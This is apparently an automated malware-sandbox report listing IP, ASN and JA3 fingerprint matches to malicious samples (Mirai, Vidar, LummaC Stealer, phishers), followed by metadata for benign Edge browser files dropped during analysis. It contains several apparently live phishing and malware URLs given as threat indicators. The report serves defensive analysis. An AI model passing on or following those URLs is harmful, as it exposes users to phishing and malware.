                                                                                                                                            SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 162.159.61.3
                                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                            • 162.159.61.3
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.64.41.3
                                                                                                                                            ssl.bingadsedgeextension-prod-europe.azurewebsites.netLVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                            • 94.245.104.56
                                                                                                                                            sb.scorecardresearch.combc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                            • 18.244.18.27
                                                                                                                                            https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 18.244.18.32
                                                                                                                                            http://indyhumane.orgGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.38
                                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.32
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.27
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.32
                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.173.166.9
                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 13.32.110.104
                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 18.244.18.27
                                                                                                                                            nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                                                            • 18.244.18.122

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUScLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 20.189.173.28
                                                                                                                                            https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 13.107.253.45
                                                                                                                                            https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 20.42.73.31
                                                                                                                                            mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.170.57.197
                                                                                                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.74.19.248
                                                                                                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.64.30.232
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.183.20.33
                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.162.225.223
                                                                                                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.140.64.179
                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.238.114.39
                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUScLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 20.189.173.28
                                                                                                                                            https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 13.107.253.45
                                                                                                                                            https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 20.42.73.31
                                                                                                                                            mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.170.57.197
                                                                                                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.74.19.248
                                                                                                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.64.30.232
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.183.20.33
                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 20.162.225.223
                                                                                                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.140.64.179
                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 22.238.114.39
                                                                                                                                            AKAMAI-ASN1EUmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 23.78.146.158
                                                                                                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 23.63.23.113
                                                                                                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 23.194.118.65
                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 23.199.18.240
                                                                                                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 23.77.244.206
                                                                                                                                            bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                            • 104.70.121.217
                                                                                                                                            https://user-logln.net-protected.net/de/?code=9a7d7f86cffe7c7d6feaede517e284f4Get hashmaliciousUnknownBrowse
                                                                                                                                            • 23.2.73.221
                                                                                                                                            https://mo.iecxtug.ru/eoQpd/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 2.16.168.11
                                                                                                                                            https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26Get hashmaliciousUnknownBrowse
                                                                                                                                            • 2.16.168.197
                                                                                                                                            Your Google Account has been deleted due to Terms of Service violations.emlGet hashmaliciousUnknownBrowse
                                                                                                                                            • 2.16.168.119
                                                                                                                                            CLOUDFLARENETUShttps://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.18.11.207
                                                                                                                                            https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.16.117.116
                                                                                                                                            http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                            • 104.21.48.1
                                                                                                                                            m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 8.44.59.63
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 1.12.64.0
                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 1.15.80.127
                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 1.12.59.181
                                                                                                                                            December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.48.1
                                                                                                                                            http://lynxblog.netGet hashmaliciousUnknownBrowse
                                                                                                                                            • 1.1.1.1

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            uU6IvUPN39.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.80.52

                                                                                                                                            Dropped Files

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.execLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                              LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                                                                                                                                            MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              UolJwovI8c.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0660d35c-0c84-4eda-b6b3-3c0dfcb7c528.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44695
                                                                                                                                                                Entropy (8bit):6.0950463386966724
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kJWKKGf4YMZ5eatyFlAHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yndMZfN7VLyMV/YoskFoz
                                                                                                                                                                MD5:E6F17A80820B66DBA17388136E50103A
                                                                                                                                                                SHA1:4BA23B491A33DBAC4EB5BED20762DBE6C993014C
                                                                                                                                                                SHA-256:3CB78D42D9BA5B1FE878605A169206581CB338AF339228249407D81081DEA19A
                                                                                                                                                                SHA-512:E2122837B46A6933CB59816727B7401081631BA1971C2864B12287B5082D635AF9D1ACFC1376E9DC151ABED155E06D6388A2BB66BCE76662FA393673E14A8B26
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\25eefdb7-216c-4022-b847-863336ed2d49.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):45936
                                                                                                                                                                Entropy (8bit):6.088194065813754
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:UMkbJrT8IeQc5daNzKKGf4YMZPVajeQuuHXcQSfMCios7DRo+yM/42cRaLMos77:UMk1rT8H1asMZ+H9Fos7VLyMV/YosH
                                                                                                                                                                MD5:62F4AF102572FC7DE68C282791D959E5
                                                                                                                                                                SHA1:A1A953C5618AA153BF597885EB7C3F2F69330ECF
                                                                                                                                                                SHA-256:962871EEF91C510A4DAA4C37FF5C1BA56D60DDDFAA5016183255EF3A92F0521B
                                                                                                                                                                SHA-512:0E828E7B0B7A5C660A7E2C05BA592EADE40B6F6019AF24DCA137B8C96C0AC334368132EAF34F1AFA080604BBFA44447A3A0CDD52170FE6FB416C4BB5F1E36354
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"06756165-738a-4eac-aa05-b3426f7d05eb"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\37d3c6eb-51d2-4f60-9fcf-6172d71dde37.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44773
                                                                                                                                                                Entropy (8bit):6.095222529536204
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xAWKKGf4YMZPVajeQuuN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yOgMZ+N7VLyMV/YoskFoz
                                                                                                                                                                MD5:38084BBE29F807E96DE2F9A037C2221C
                                                                                                                                                                SHA1:DC381DD741E0FC363ABADBF5CD0DA3F26F8ACC78
                                                                                                                                                                SHA-256:7410B807237200943E4BC918BB1CFC0C56453BD4B596BA1C6B13EEACAC31BD53
                                                                                                                                                                SHA-512:A5F652ADC939FFF81506B98F605AF146D82F98E2B7347C0B56135138971E35B394C5409E738F4254EE57CF5BE1BCD624CBAEE2D7879676B1A3EAE93FD0934CB7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8001ddf7-c79c-4812-af23-770dcc7144aa.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):44695
                                                                                                                                                                Entropy (8bit):6.0950463386966724
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kJWKKGf4YMZ5eatyFlAHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yndMZfN7VLyMV/YoskFoz
                                                                                                                                                                MD5:E6F17A80820B66DBA17388136E50103A
                                                                                                                                                                SHA1:4BA23B491A33DBAC4EB5BED20762DBE6C993014C
                                                                                                                                                                SHA-256:3CB78D42D9BA5B1FE878605A169206581CB338AF339228249407D81081DEA19A
                                                                                                                                                                SHA-512:E2122837B46A6933CB59816727B7401081631BA1971C2864B12287B5082D635AF9D1ACFC1376E9DC151ABED155E06D6388A2BB66BCE76662FA393673E14A8B26
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a9b29cce-e301-40ec-a383-05f5be855abd.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                Entropy (8bit):4.640159940159965
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                Entropy (8bit):4.640159940159965
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD242-7FC.pma

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                Entropy (8bit):0.048007862694962676
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:KPE0m5tmcnOAUZYYaJ/7qiRDs0JEYg7Xr/eIKJEm98RVh7JNs59URQsIn2Pn8y0d:YE0UtzX01OiVhNqo22P08T2RGOD
                                                                                                                                                                MD5:3E997DA2AB11CF936672AFB3C3F77115
                                                                                                                                                                SHA1:2E31613B00271E7C2407062425D8B1AEC9840BE6
                                                                                                                                                                SHA-256:926DD0A91282233B61A2D4F1BAFA972FEFB97B58C3A18B4DC00274CB7F8678D6
                                                                                                                                                                SHA-512:5B2AED268ED78451389B4E3AEC7F38B8D02AEAC28110C5A5D142CB47A25593B75170781CE7EA807CAEDB7BFF66B8E941B40E8B11F03EF0A3EC9F7ADD2CF7CC58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...@..@...@.....C.].....@................k..h[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fglocg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.......,......

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD243-1D9C.pma

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                Entropy (8bit):0.448223483660178
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:FNGqRRml3W/R78Sxwil0qDM9YYzNuaHzK1:uk/RgYwouTK
                                                                                                                                                                MD5:E3D04635FBCAF93FDE16BBA7034A337C
                                                                                                                                                                SHA1:97C81BF7195327B65EDED65EABA9D3E0D951630D
                                                                                                                                                                SHA-256:95ED7C4C51FF87D386E34914F9CBDA39C510B3ABDB4DBE605A9FC4BBF6B288A8
                                                                                                                                                                SHA-512:A79BA051F4A137850A05A1C406C11454F194E897AC1BD44A44E10BA0333210345E29E4BE615A2FA5BD9700B35FEE649A39556F0BDE624D61A01E0E591A92B667
                                                                                                                                                                Malicious:false
